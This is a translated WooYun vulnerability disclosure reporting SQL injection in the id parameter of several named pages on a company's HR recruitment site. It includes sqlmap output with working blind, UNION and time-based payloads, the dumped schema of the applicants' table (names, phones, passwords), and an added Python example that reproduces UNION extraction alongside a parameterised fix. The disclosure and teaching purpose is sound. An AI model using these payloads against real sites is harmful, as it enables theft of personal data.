
Vulnerability Summary

Defect ID: wooyun-2015-0105969

Title: SQL injection at Shandong Kaichuang Group (山东开创集团) leaks users' sensitive information

Vendor: 山东开创集团 (Shandong Kaichuang Group)

Author: lnterface

Submitted: 2015-04-08 11:34

Fix deadline: 2015-05-23 11:36

Published: 2015-05-23 11:36

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-04-08: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-05-23: Vendor has actively ignored the report; details disclosed to the public

Brief description:

  Shandong Kaichuang Group Co., Ltd. is a leading domestic internet marketing expert and cloud computing service provider. It has worked with Baidu for many years and provides online promotion services to hundreds of thousands of enterprises. It holds multiple independent intellectual property rights and software copyright products; the Kaichuang Cloud platform, built on its self-developed cloud computing technology, targets domestic small and medium enterprises with domain registration, cloud hosting, enterprise email, website construction and office software systems (OA, CRM, HR, ERP). Kaichuang Cloud has been named a Shandong Province Famous Brand and has become an industry leader!
  Shandong Kaichuang Group Co., Ltd. is one of the largest internet infrastructure service providers in the industry certified by the Ministry of Industry and Information Technology and the Shandong Provincial Communications Administration; a member of the Internet Society of China, the Shandong Internet Association, the Shandong Software Association, the Shandong E-commerce Promotion Association and the Jinan Software Association; a national "double-soft" certified enterprise; certified to CMMI3, ISO9001 and ISO27001; one of Shandong's Ten Outstanding Contributors to Informatization, one of Shandong's Ten Brands with the Most Growth Potential, and an Outstanding Software Enterprise of Shandong Province. The company has also been awarded the titles of Municipal Youth Civilization Unit, Provincial Youth Civilization Unit, Jinan Volunteer Service Collective, Jinan Employment Internship Base and May Fourth Red Flag Youth League Branch.

Detailed description:

Someone in a group chat was job hunting and asked what this company was like, so I gave it a casual test. Good grief, this injection is far too obvious.
Not farming vulnerabilities; the injections are bundled into one report.
Vulnerable URLs:

http://hr.ctrl.com.cn/JobDeatil.aspx?id=79
http://hr.ctrl.com.cn/Developing.aspx?id=6
http://hr.ctrl.com.cn/JobHelp.aspx?id=1
http://hr.ctrl.com.cn/News.aspx?id=2
http://hr.ctrl.com.cn/newsMore.aspx?id=19
The injectable parameter is id in every case.


Having confirmed the injection, just run it straight away:

[Image: kc1.jpg]


Such a new system!

Proof of vulnerability:

[Image: kc1.jpg]


The applicants' table: name, phone, email, password and so on are all there; fairly detailed, I'd say.

[*] starting at 09:41:32
[09:41:32] [INFO] resuming back-end DBMS 'microsoft sql server'
[09:41:32] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 7894=7894
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-6640 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(97)+CHAR(108)+CHAR(113)+CHAR(113)+CHAR(72)+CHAR(122)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(70)+CHAR(108)+CHAR(90)+CHAR(109)+CHAR(102)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113),NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=6; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=6 WAITFOR DELAY '0:0:5'--
---
[09:41:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[09:41:33] [INFO] fetching columns for table 'HrMember' in database 'ctrl'
[09:41:33] [WARNING] reflective value(s) found and filtering out
[09:41:33] [INFO] the SQL query used returns 34 entries
[09:41:33] [INFO] retrieved: "addDate","datetime"
[09:41:33] [INFO] retrieved: "brithday","datetime"
[09:41:33] [INFO] retrieved: "comDate","nvarchar"
[09:41:34] [INFO] retrieved: "comEmail","int"
[09:41:34] [INFO] retrieved: "id","int"
[09:41:35] [INFO] retrieved: "isBaby","nvarchar"
[09:41:35] [INFO] retrieved: "isMarryage","nvarchar"
[09:41:36] [INFO] retrieved: "isUser","int"
[09:41:36] [INFO] retrieved: "mEmail","nvarchar"
[09:41:37] [INFO] retrieved: "memberImg","nvarchar"
[09:41:37] [INFO] retrieved: "mhometown","nvarchar"
[09:41:38] [INFO] retrieved: "mHometownCity","nvarchar"
[09:41:38] [INFO] retrieved: "mHometownCityId","nvarchar"
[09:41:39] [INFO] retrieved: "mHometownId","nvarchar"
[09:41:39] [INFO] retrieved: "mName","nvarchar"
[09:41:39] [INFO] retrieved: "mnation","nvarchar"
[09:41:40] [INFO] retrieved: "mType","nvarchar"
[09:41:40] [INFO] retrieved: "mWorkYear","int"
[09:41:41] [INFO] retrieved: "newCity","nvarchar"
[09:41:41] [INFO] retrieved: "newCityID","nvarchar"
[09:41:41] [INFO] retrieved: "newProvince","nvarchar"
[09:41:41] [INFO] retrieved: "newProvinceId","nvarchar"
[09:41:42] [INFO] retrieved: "oldCity","nvarchar"
[09:41:42] [INFO] retrieved: "oldCityId","nvarchar"
[09:41:43] [INFO] retrieved: "oldProvince","nvarchar"
[09:41:43] [INFO] retrieved: "oldProvinceId","nvarchar"
[09:41:43] [INFO] retrieved: "peopleNum","nvarchar"
[09:41:44] [INFO] retrieved: "peopleType","nvarchar"
[09:41:44] [INFO] retrieved: "Phone","nvarchar"
[09:41:44] [INFO] retrieved: "pwd","nvarchar"
[09:41:45] [INFO] retrieved: "sex","int"
[09:41:46] [INFO] retrieved: "StudySchool","nvarchar"
[09:41:46] [INFO] retrieved: "StudyType","nvarchar"
[09:41:47] [INFO] retrieved: "tel","nvarchar"
Database: ctrl
Table: HrMember
[34 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| addDate         | datetime |
| brithday        | datetime |
| comDate         | nvarchar |
| comEmail        | int      |
| id              | int      |
| isBaby          | nvarchar |
| isMarryage      | nvarchar |
| isUser          | int      |
| mEmail          | nvarchar |
| memberImg       | nvarchar |
| mhometown       | nvarchar |
| mHometownCity   | nvarchar |
| mHometownCityId | nvarchar |
| mHometownId     | nvarchar |
| mName           | nvarchar |
| mnation         | nvarchar |
| mType           | nvarchar |
| mWorkYear       | int      |
| newCity         | nvarchar |
| newCityID       | nvarchar |
| newProvince     | nvarchar |
| newProvinceId   | nvarchar |
| oldCity         | nvarchar |
| oldCityId       | nvarchar |
| oldProvince     | nvarchar |
| oldProvinceId   | nvarchar |
| peopleNum       | nvarchar |
| peopleType      | nvarchar |
| Phone           | nvarchar |
| pwd             | nvarchar |
| sex             | int      |
| StudySchool     | nvarchar |
| StudyType       | nvarchar |
| tel             | nvarchar |
+-----------------+----------+


This test did not retrieve any user data.
So many injection points bundled together; asking for a high rank.

Fix:

Filtering.
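The one-word fix above, filtering, is necessary but not sufficient: what removes the bug class is never letting the id value become SQL syntax, i.e. validating it as an integer and binding it as a query parameter. The block below is an added example, not the vendor's code or the report author's: a SQLite-backed stand-in for the ASP.NET/SQL Server pages listed in the detailed description. It shows the string-concatenation pattern behind the id injection, the boolean-based blind check and the UNION technique that the sqlmap output reports (reduced from six columns to the three the stand-in query selects; the SQL Server WAITFOR DELAY payloads have no SQLite equivalent and are not reproduced), and the parameterised query that closes the hole. Table and column names (News, HrMember, mEmail, pwd) follow the report; the rows are constructed, and the page templates and function names are assumptions of this example.

```python
"""Added example: id injection as in the report, reproduced against SQLite (not vendor code)."""
import re
import sqlite3
from typing import Callable, List, Tuple

# A "fetch" takes the raw value of the id query parameter and returns the page body,
# standing in for an HTTP GET such as News.aspx?id=<value>.
Fetch = Callable[[str], str]

PAGE_ROW = "<h2>{}</h2><p>{}</p>"
NOT_FOUND = "<p>No such item</p>"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: names follow the report's schema, values are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE News (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO News VALUES (2, 'Company news', 'Welcome to the careers site');
        INSERT INTO News VALUES (6, 'Developing', 'We are hiring');
        CREATE TABLE HrMember (id INTEGER PRIMARY KEY, mName TEXT, mEmail TEXT, pwd TEXT);
        INSERT INTO HrMember VALUES (1, 'applicant-a', '[email protected]', 'pw-a');
        INSERT INTO HrMember VALUES (2, 'applicant-b', '[email protected]', 'pw-b');
        """
    )
    return conn


def vulnerable_page(conn: sqlite3.Connection, raw_id: str) -> str:
    """The anti-pattern behind the report: the query-string value is spliced into SQL text."""
    sql = "SELECT id, title, body FROM News WHERE id=" + raw_id
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return "<h1>Error</h1>"
    return "".join(PAGE_ROW.format(title, body) for _, title, body in rows) or NOT_FOUND


def hardened_page(conn: sqlite3.Connection, raw_id: str) -> str:
    """Fix: validate the type, then bind the value as a parameter; it can never become SQL."""
    try:
        item_id = int(raw_id)
    except ValueError:
        return "<p>Bad request</p>"
    rows = conn.execute("SELECT id, title, body FROM News WHERE id=?", (item_id,)).fetchall()
    return "".join(PAGE_ROW.format(title, body) for _, title, body in rows) or NOT_FOUND


def boolean_blind_oracle(fetch: Fetch, base_id: str) -> bool:
    """The check sqlmap labelled 'AND boolean-based blind': a true tautology must leave the
    page unchanged while a false one must change it. A hardened page rejects both."""
    baseline = fetch(base_id)
    true_page = fetch(f"{base_id} AND 7894=7894")
    false_page = fetch(f"{base_id} AND 7894=7895")
    return true_page == baseline and false_page != baseline


def union_extract(fetch: Fetch) -> List[Tuple[str, str]]:
    """The 'Generic UNION query' technique: a negative id empties the real result set, and a
    UNION ALL with the same column count (three here) renders HrMember rows through the
    page's own template, from which (mEmail, pwd) pairs are scraped back out."""
    body = fetch("-1 UNION ALL SELECT id, mEmail, pwd FROM HrMember")
    return re.findall(r"<h2>(.*?)</h2><p>(.*?)</p>", body)


def run_demo() -> dict:
    """Runs both checks against the vulnerable and the hardened page."""
    conn = make_db()
    vuln: Fetch = lambda v: vulnerable_page(conn, v)
    safe: Fetch = lambda v: hardened_page(conn, v)
    return {
        "vulnerable_blind": boolean_blind_oracle(vuln, "6"),
        "hardened_blind": boolean_blind_oracle(safe, "6"),
        "vulnerable_union": union_extract(vuln),
        "hardened_union": union_extract(safe),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The oracle compares whole page bodies, which is enough for a static page; against a real site with timestamps or rotating banners the comparison has to be fuzzier (sqlmap's "reflective value(s) found and filtering out" line in the log above is exactly that kind of normalisation).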

Copyright notice: when reposting, please credit the source: lnterface@乌云 (WooYun)


Vendor Response

Vendor reply:

Unable to contact the vendor, or the vendor actively refused.